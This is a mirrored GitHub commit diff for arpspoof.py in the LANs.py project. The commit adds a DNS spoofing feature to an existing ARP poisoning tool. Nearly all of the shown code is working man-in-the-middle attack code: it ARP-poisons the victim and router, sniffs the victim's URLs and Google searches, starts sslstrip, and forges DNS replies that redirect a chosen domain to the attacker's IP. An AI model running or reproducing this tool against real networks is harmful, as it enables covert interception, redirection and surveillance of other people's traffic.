mirror of
https://github.com/DanMcInerney/LANs.py.git
synced 2025-07-07 05:22:11 -07:00
Added DNS spoofing! Just use the option -dns <domain> to spoof <domain> onto your local IP
This commit is contained in:
DanMcInerney
parent
f240e06400
commit
39d73cc154
1 changed files with 35 additions and 9 deletions
44
arpspoof.py
44
arpspoof.py
|
|
@ -4,7 +4,7 @@ import logging
|
|||
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
|
||||
from scapy.all import *
|
||||
conf.verb=0
|
||||
#Below is necessary to receive a response to the DHCP packets for some reason
|
||||
#Below is necessary to receive a response to the DHCP packets for some reason. If you know the answer to that message me.
|
||||
conf.checkIPaddr=0
|
||||
import time
|
||||
import sys
|
||||
|
|
@ -29,6 +29,7 @@ parser.add_argument("-i", "--driftnet", help="Open an xterm window with driftnet
|
|||
parser.add_argument("-g", "--google", help="Print google searches.", action="store_true")
|
||||
parser.add_argument("-s", "--sslstrip", help="Open an xterm window with sslstrip and output to sslstrip.txt", action="store_true")
|
||||
parser.add_argument("-uv", "--verboseURL", help="Shows all URLs the victim visits.", action="store_true")
|
||||
parser.add_argument("-dns", "--dnsspoof", help="Spoof DNS responses of a specific domain. Enter domain after this argument")
|
||||
args = parser.parse_args()
|
||||
|
||||
#Find the gateway and use it as the router's info
|
||||
|
|
@ -37,8 +38,9 @@ routerRE = re.search('default via ((\d{2,3}\.\d{1,3}\.\d{1,4}\.)\d{1,3}) \w+ (\w
|
|||
routerIP = routerRE.group(1)
|
||||
IPprefix = routerRE.group(2)
|
||||
interface = routerRE.group(3)
|
||||
localIP = [x[4] for x in scapy.all.conf.route.routes if x[2] != '0.0.0.0'][0]
|
||||
|
||||
if args.dnsspy:
|
||||
if args.dnsspy or args.dnsspoof:
|
||||
print "Checking if the router is the DNS server..."
|
||||
dhcp_discover = Ether(dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67)/BOOTP(chaddr=RandString(12,'0123456789abcdef'))/DHCP(options=[("message-type","discover"),"end"])
|
||||
ans, unans = srp(dhcp_discover, timeout=5, retry=2)
|
||||
|
|
@ -47,7 +49,7 @@ if args.dnsspy:
|
|||
DNSserver = p[1][IP].src
|
||||
print "DNS server at: ", DNSserver, '\n'
|
||||
else:
|
||||
print "No answer to DHCP packet sent to find DNS server\n"
|
||||
print "No answer to DHCP packet sent to find the DNS server.\n"
|
||||
|
||||
if args.ipaddress:
|
||||
victimIP = args.ipaddress
|
||||
|
|
@ -69,8 +71,8 @@ def poison(routerIP, victimIP):
|
|||
send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst="ff:ff:ff:ff:ff:ff"))
|
||||
|
||||
def restore(routerIP, victimIP, routerMAC, victimMAC):
|
||||
send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=routerMAC), count=5)
|
||||
send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victimMAC), count=5)
|
||||
send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victimMAC), count=5)
|
||||
send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=routerMAC), count=5)
|
||||
|
||||
def URL(pkt):
|
||||
if pkt.haslayer(Raw):
|
||||
|
|
@ -84,6 +86,7 @@ def URL(pkt):
|
|||
b = a[1].split(" ")
|
||||
c = a[0].split(" ")
|
||||
url = b[1]+c[1]
|
||||
print url
|
||||
if args.urlspy:
|
||||
d = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js']
|
||||
if any(i in url for i in d):
|
||||
|
|
@ -99,18 +102,36 @@ def URL(pkt):
|
|||
search = search.replace('q=', '').replace('+', ' ').replace('%20', ' ').replace('%3F', '?').replace('%27', '\'')
|
||||
print '%s googled:' % victimIP, search
|
||||
|
||||
def DNS(pkt):
|
||||
def DNSreq(pkt):
|
||||
if pkt.haslayer(DNSQR):
|
||||
dnsreq = pkt[DNSQR].qname
|
||||
print dnsreq
|
||||
|
||||
def mkspoof(DNSpkt):
|
||||
ip=DNSpkt[IP]
|
||||
dnsLayer=DNSpkt[DNS]
|
||||
#qr = query or response (0,1), aa=are the nameservers authoritative? (0,1), ad=authenticated data (0,1)
|
||||
p = IP(dst=ip.src, src=ip.dst)/UDP(dport=ip.sport, sport=ip.dport)/DNS(id=dnsLayer.id, qr=1, aa=1, qd=dnsLayer.qd, an=DNSRR(rrname=dnsLayer.qd.qname, ttl=10, rdata=localIP))
|
||||
return p
|
||||
|
||||
class urlspy(threading.Thread):
|
||||
def run(self):
|
||||
sniff(store=0, filter='port 80 and host %s' % victimIP, prn=URL, iface=interface)
|
||||
|
||||
class dnsspy(threading.Thread):
|
||||
def run(self):
|
||||
sniff(store=0, filter='port 53 and host %s' % victimIP, prn=DNS, iface=interface)
|
||||
sniff(store=0, filter='port 53 and host %s' % victimIP, prn=DNSreq, iface=interface)
|
||||
|
||||
class dnsspoof(threading.Thread):
|
||||
def run(self):
|
||||
while 1:
|
||||
a=sniff(filter='port 53 and host %s' % victimIP, count=1, promisc=1)
|
||||
DNSpkt = a[0]
|
||||
if not DNSpkt.haslayer(DNSQR):
|
||||
continue
|
||||
if args.dnsspoof in DNSpkt.qd.qname:
|
||||
send(mkspoof(DNSpkt))
|
||||
print 'Sent spoofed DNS response packet for', DNSpkt.qd.qname
|
||||
|
||||
#class ssltrip(threading.Thread):
|
||||
# def run(self):
|
||||
|
|
@ -141,7 +162,7 @@ def main():
|
|||
except:
|
||||
sys.exit("Could not get MAC addresses")
|
||||
|
||||
if args.urlspy or args.google:
|
||||
if args.urlspy or args.google or args.verboseURL:
|
||||
ug = urlspy()
|
||||
#Make sure the thread closes with the main program on Ctrl-C
|
||||
ug.daemon = True
|
||||
|
|
@ -159,6 +180,11 @@ def main():
|
|||
if args.sslstrip:
|
||||
sslstrip()
|
||||
|
||||
if args.dnsspoof:
|
||||
ds = dnsspoof()
|
||||
ds.daemon = True
|
||||
ds.start()
|
||||
|
||||
def signal_handler(signal, frame):
|
||||
print 'learing iptables, sending healing packets, and turning off IP forwarding...'
|
||||
restore(routerIP, victimIP, routerMAC, victimMAC)
|
||||
|
|
@ -178,7 +204,7 @@ def main():
|
|||
poison(DNSserver, victimIP)
|
||||
except Exception:
|
||||
pass
|
||||
time.sleep(4)
|
||||
time.sleep(1.5)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue